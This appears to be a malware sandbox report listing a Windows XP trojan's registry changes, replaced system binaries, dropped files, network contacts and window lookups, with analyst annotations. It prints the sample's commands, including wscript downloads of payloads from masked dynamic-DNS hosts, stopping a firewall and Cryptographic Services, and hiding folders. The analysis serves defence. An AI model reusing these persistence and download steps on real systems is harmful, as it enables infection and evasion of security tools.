Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'notepax.exe' = '%WINDIR%\notepax.exe' (Run-key persistence: %WINDIR%\notepax.exe is started at every interactive logon; note the name mimics notepad.exe)
- [<HKLM>\SYSTEM\ControlSet001\Services\ClipSrv] 'Start' = '00000002' (ClipBook service set to SERVICE_AUTO_START; it is disabled/manual on a default install)
- [<HKLM>\SYSTEM\ControlSet001\Services\CiSvc] 'Start' = '00000002' (Indexing Service set to SERVICE_AUTO_START; combined with the replaced service binaries below, this turns two built-in services into a second persistence mechanism)
- Replaces <SYSTEM32>\cisvc.exe with <SYSTEM32>\cisvc1.exe
- Replaces <SYSTEM32>\dllcache\cisvc.exe with <SYSTEM32>\dllcache\cisvc1.exe (the dllcache copy is overwritten too, so Windows File Protection would "restore" the trojanized binary rather than the original)
- Replaces <SYSTEM32>\clipsrv.exe with <SYSTEM32>\clipsrv1.exe
- Replaces <SYSTEM32>\dllcache\clipsrv.exe with <SYSTEM32>\dllcache\clipsrv1.exe (same WFP-cache tampering as for cisvc.exe; compare both files against known-good copies from installation media rather than trusting sfc /scannow)
- '%TEMP%\IXP000.TMP\notepa.exe' (%TEMP%\IXP000.TMP is the extraction directory used by IExpress self-extracting packages, so the initial dropper appears to be an IExpress bundle)
- '%TEMP%\svchst.exe'
- '%TEMP%\svchost.exe'
- '%TEMP%\IXP000.TMP\svcoht.exe'
- '%PROGRAM_FILES%\xerox\nwwia\svchost.exe' (masquerades as the system svchost.exe, which legitimately exists only under <SYSTEM32>; the %PROGRAM_FILES%\xerox\nwwia folder is present but empty on a default Windows XP install, which makes it a convenient hiding place)
- '%PROGRAM_FILES%\xerox\wupdmgr.exe'
- '%TEMP%\svchost.exe' (downloaded from the Internet)
- '%TEMP%\svchst.exe' (downloaded from the Internet)
- '<SYSTEM32>\find.exe' "Reply from"
- '<SYSTEM32>\taskkill.exe' /f /im clipsrv.exe
- '%WINDIR%\regedit.exe' /s winrp.reg (/s imports the .reg file silently, with no confirmation prompt)
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\*.*"
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox"
- '<SYSTEM32>\ping.exe' www.google.com
- '%WINDIR%\regedit.exe' /s wi.reg
- '<SYSTEM32>\cmd.exe' /c %TEMP%\260937.bat
- '<SYSTEM32>\wscript.exe' "%PROGRAM_FILES%\xerox\nwwia\donw.vbs" http://ta####ns.gicp.net/admin/Images/200899172011616.Css %TEMP%\svchost.exe
- '<SYSTEM32>\wscript.exe' "%PROGRAM_FILES%\xerox\nwwia\donw.vbs" http://ki###f.3322.org/uploadfile/swf/2008-9/200899172011699.swf %TEMP%\svchst.exe
- '<SYSTEM32>\ping.exe' 127.1 -n 10 (loopback ping used as a ~10-second delay, a common batch-file substitute for sleep)
- '<SYSTEM32>\taskkill.exe' /f /im wupdmgr.exe (the name imitates the Windows Update manager; this is the dropped %PROGRAM_FILES%\xerox\wupdmgr.exe, not a Microsoft binary)
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\nwwia\*.*"
- '<SYSTEM32>\net.exe' stop kpfwsvc (kpfwsvc appears to be the Kingsoft personal firewall service; stopping it disables a third-party host firewall before the downloads)
- '<SYSTEM32>\net1.exe' stop kpfwsvc
- '<SYSTEM32>\net.exe' stop clipsrv
- '<SYSTEM32>\cmd.exe' /c %TEMP%\127093.bat
- '<SYSTEM32>\net.exe' stop cryptsvc (Cryptographic Services; stopping it breaks Authenticode/catalog signature checks and Windows Update, which also helps the replaced system binaries go unnoticed)
- '<SYSTEM32>\net1.exe' stop cryptsvc
- '<SYSTEM32>\cmd.exe' /c %TEMP%\178609.bat
- '<SYSTEM32>\taskkill.exe' /f /im cisvc.exe
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\nwwia"
- '<SYSTEM32>\net1.exe' stop clipsrv
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\shijian.vbs"
- '%WINDIR%\regedit.exe' /s winr.reg
- <SYSTEM32>\dllcache\cisvc1.exe
- %TEMP%\svchst.exe
- <SYSTEM32>\dllcache\clipsrv1.exe
- <SYSTEM32>\cisvc1.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\200899172011699[1].swf (the downloads went through the WinInet/IE cache; these cached copies are a useful forensic artifact even if the %TEMP% copies are later removed)
- %TEMP%\178609.bat
- %WINDIR%\notepax.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\windowsupdate.microsoft[1] (cached response from windowsupdate.microsoft.com; probably another connectivity check, see the DNS query below)
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %TEMP%\260937.bat
- %WINDIR%\tangnop.exe
- %TEMP%\svchost.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\200899172011616[1].css
- %WINDIR%\tangnox.htm
- %WINDIR%\nox.exe
- <SYSTEM32>\clipsrv1.exe
- %WINDIR%\GetUrl.htm
- %WINDIR%\nox1.exe
- %PROGRAM_FILES%\xerox\nwwia\donw.vbs
- %TEMP%\IXP000.TMP\nox1.exe
- %TEMP%\IXP000.TMP\notepax.exe
- %TEMP%\IXP000.TMP\shijian.vbs
- %TEMP%\IXP000.TMP\nox.exe
- %TEMP%\IXP000.TMP\notepa.exe
- %TEMP%\IXP000.TMP\clipsrv1.exe
- %TEMP%\IXP000.TMP\cisvc1.exe
- %TEMP%\IXP000.TMP\GetUrl.htm
- %TEMP%\IXP000.TMP\donw.vbs
- %TEMP%\IXP000.TMP\winrp.reg
- %TEMP%\IXP000.TMP\winr.reg
- %PROGRAM_FILES%\xerox\nwwia\svchost.exe
- %TEMP%\127093.bat
- %TEMP%\IXP000.TMP\wi.reg
- %TEMP%\IXP000.TMP\svcoht.exe
- %TEMP%\IXP000.TMP\svchost.exe
- %TEMP%\IXP000.TMP\tangnox.htm
- %TEMP%\IXP000.TMP\tangnop.exe
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %PROGRAM_FILES%\xerox\nwwia\svchost.exe
- %PROGRAM_FILES%\xerox\nwwia\donw.vbs
- %TEMP%\IXP000.TMP\nox1.exe
- %TEMP%\IXP000.TMP\notepax.exe
- %TEMP%\IXP000.TMP\nox.exe
- %TEMP%\IXP000.TMP\svcoht.exe
- %TEMP%\IXP000.TMP\shijian.vbs
- %TEMP%\IXP000.TMP\notepa.exe
- %TEMP%\IXP000.TMP\cisvc1.exe
- %TEMP%\178609.bat
- %TEMP%\IXP000.TMP\clipsrv1.exe
- %TEMP%\IXP000.TMP\GetUrl.htm
- %TEMP%\IXP000.TMP\donw.vbs
- <SYSTEM32>\dllcache\clipsrv.exe
- <SYSTEM32>\clipsrv.exe
- <SYSTEM32>\cisvc.exe
- %TEMP%\IXP000.TMP\svchost.exe
- <SYSTEM32>\dllcache\cisvc.exe
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %TEMP%\IXP000.TMP\tangnox.htm
- %TEMP%\IXP000.TMP\tangnop.exe
- %TEMP%\IXP000.TMP\wi.reg
- %TEMP%\IXP000.TMP\winrp.reg
- %TEMP%\IXP000.TMP\winr.reg
- 'ki###f.3322.org':80 (3322.org is a dynamic-DNS provider; block the full hostname, not just the resolved IP, since it can change)
- 'localhost':1043
- 'ta####ns.gicp.net':80 (gicp.net is likewise a dynamic-DNS provider)
- 'localhost':1037
- 'localhost':1039
- '20#.#6.232.182':80 (partially masked in this report; the only request observed to it is a GET of "/")
- ta####ns.gicp.net/admin/images/200899172011616.css
- ki###f.3322.org/uploadfile/swf/2008-9/200899172011699.swf
- 20#.#6.232.182/
- DNS ASK ki###f.3322.org
- DNS ASK ta####ns.gicp.net
- DNS ASK www.google.com
- DNS ASK windowsupdate.microsoft.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)' (window-class lookups, presumably FindWindow; Shell_TrayWnd is the taskbar)
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)' (Registry Editor's main window class; looking for it may be a check for whether an analyst has regedit open, though the sample also launches regedit itself, so this is not conclusive)
- ClassName: '(null)' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'